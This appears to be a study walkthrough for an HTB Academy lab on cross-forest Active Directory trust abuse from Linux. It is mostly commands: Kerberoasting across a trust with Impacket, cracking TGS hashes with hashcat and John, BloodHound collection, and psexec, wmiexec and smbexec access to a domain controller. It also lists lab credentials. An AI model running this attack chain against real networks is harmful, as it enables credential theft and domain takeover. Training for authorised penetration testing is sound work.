🐧Cross-Forest Trust Abuse - from Linux

🎯 HTB Academy: Active Directory Enumeration & Attacks

πŸ“ Overview

Cross-Forest Trust Abuse from Linux leverages Impacket toolkit and bloodhound-python to exploit forest trust relationships from Linux attack hosts. This approach provides cross-platform capability for cross-forest Kerberoasting, foreign group membership discovery, and multi-domain compromise using Python-based tools.

🎫 Cross-Forest Kerberoasting

Attack Methodology

  • Tool: impacket-GetUserSPNs with -target-domain flag

  • Requirements: Valid credentials in source domain, bidirectional trust

  • Target: Service accounts with SPNs in trusted forest

  • Goal: Obtain TGS tickets for offline cracking

Execution Workflow

SPN Enumeration

# Enumerate SPNs in trusted domain
impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

# Expected output:
ServicePrincipalName                 Name      MemberOf                                                PasswordLastSet             LastLogon  Delegation 
-----------------------------------  --------  ------------------------------------------------------  --------------------------  ---------  ----------
MSSQLsvc/sql01.freightlogstics:1433  mssqlsvc  CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL  2022-03-24 15:47:52.488917  <never>

TGS Ticket Extraction

# Request TGS tickets for identified SPNs
impacket-GetUserSPNs -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

# Optional: Direct output to file
impacket-GetUserSPNs -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley -outputfile cross_forest_tgs.txt

# Extract hash for offline cracking:
$krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$FREIGHTLOGISTICS.LOCAL/mssqlsvc*$[hash_data]

Hash Cracking

# Crack TGS tickets using Hashcat
hashcat -m 13100 cross_forest_tgs.txt /usr/share/wordlists/rockyou.txt

# Alternative with John the Ripper
john --format=krb5tgs cross_forest_tgs.txt --wordlist=/usr/share/wordlists/rockyou.txt

πŸ” Foreign Group Membership Discovery

bloodhound-python Multi-Domain Collection

DNS Configuration Requirements

# Edit /etc/resolv.conf for target domain resolution
sudo nano /etc/resolv.conf

# Configuration for INLANEFREIGHT.LOCAL:
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5

Data Collection Process

Primary Domain Collection

# Collect BloodHound data from primary domain
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

# Expected output:
INFO: Found AD domain: inlanefreight.local
INFO: Found 2 domains in the forest
INFO: Found 559 computers
INFO: Found 2950 users
INFO: Found 183 groups
INFO: Found 2 trusts

Trusted Domain Collection

# Update DNS for trusted domain
sudo nano /etc/resolv.conf
# Change to:
domain FREIGHTLOGISTICS.LOCAL
nameserver 172.16.5.238

# Collect data from trusted domain
bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u forend@inlanefreight.local -p Klmcargo2

Data Packaging

# Compress JSON files for BloodHound import
zip -r cross_forest_bh.zip *.json

# Import into BloodHound GUI for analysis
# Use "Users with Foreign Domain Group Membership" query

🎯 HTB Academy Lab Solutions

Lab Environment Setup

# SSH to Linux attack host
ssh htb-student@10.129.230.129
# Password: HTB_@cademy_stdnt!

πŸ” Question 1: "Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc."

Solution:

# Enumerate all SPNs in trusted domain
impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

# Look for additional SPN accounts beyond mssqlsvc
# Expected accounts may include:
# - HTTP service accounts
# - CIFS service accounts  
# - Other SQL service accounts
# - Exchange service accounts

🎯 Answer: [Additional SPN account name from enumeration]

🎫 Question 2: "Crack the TGS and submit the cleartext password as your answer."

Solution:

# Request TGS tickets for all identified SPNs
impacket-GetUserSPNs -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley -outputfile kerberoast_hashes.txt

# Crack the extracted hashes
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# Alternative cracking approach
john --format=krb5tgs kerberoast_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Monitor for successful password crack

🎯 Answer: [Cleartext password from successful hash crack]

πŸ›οΈ Question 3: "Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop."

Solution:

# Use cracked credentials to access target domain controller
# Method 1: PSExec with obtained credentials
impacket-psexec FREIGHTLOGISTICS.LOCAL/[cracked_account]@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL

# Method 2: WMIExec alternative
impacket-wmiexec FREIGHTLOGISTICS.LOCAL/[cracked_account]@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL

# Method 3: SMBExec option
impacket-smbexec FREIGHTLOGISTICS.LOCAL/[cracked_account]@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL

# From gained shell, retrieve flag:
type C:\Users\Administrator\Desktop\flag.txt

🎯 Answer: [Contents of flag.txt file]

⚠️ Attack Considerations

DNS Configuration Management

  • Requirement: bloodhound-python needs FQDN resolution

  • Solution: Edit /etc/resolv.conf for each target domain

  • Alternative: Use host file entries for specific DC resolution

  • Restoration: Backup original DNS settings before modification

Cross-Domain Authentication

  • Credential format: Use user@domain.local for cross-domain auth

  • Trust direction: Verify bidirectional trust allows authentication

  • Tool compatibility: Ensure Impacket tools support target domain format

  • Session management: Consider authentication session timeouts

Password Reuse Assessment

  • Similar accounts: Check for matching account names across domains

  • Password spraying: Test cracked passwords against multiple domains

  • Administrative overlap: Identify shared administrative accounts

  • Risk documentation: Document password reuse findings for client reporting

πŸ”‘ Key Takeaways

Cross-Platform Forest Attack Capability

Linux Impacket Tools β†’ Cross-Forest Enumeration β†’ Multi-Domain Compromise β†’ Complete Assessment
   (GetUserSPNs)          (bloodhound-python)         (PSExec/WMIExec)        (Professional Value)

Critical Success Factors

  • DNS configuration: Proper name resolution for target domains

  • Tool proficiency: Impacket suite and bloodhound-python mastery

  • Multi-domain thinking: Understanding cross-forest attack implications

  • Credential validation: Testing obtained credentials across multiple domains

Professional Impact

  • Assessment scope: Multi-forest security evaluation capability

  • Tool flexibility: Linux-based AD attack proficiency

  • Client value: Comprehensive cross-organizational security assessment

  • Risk identification: Foreign group membership and trust misconfiguration discovery

🐧 Linux-based Cross-Forest Trust Abuse provides comprehensive multi-domain attack capability - demonstrating that sophisticated forest boundary exploitation can be executed effectively from any platform using powerful Python-based tools!

PreviousCross-Forest Trust Abuse - from WindowsNextSkills Assessment Part I - Complete Walkthrough

Last updated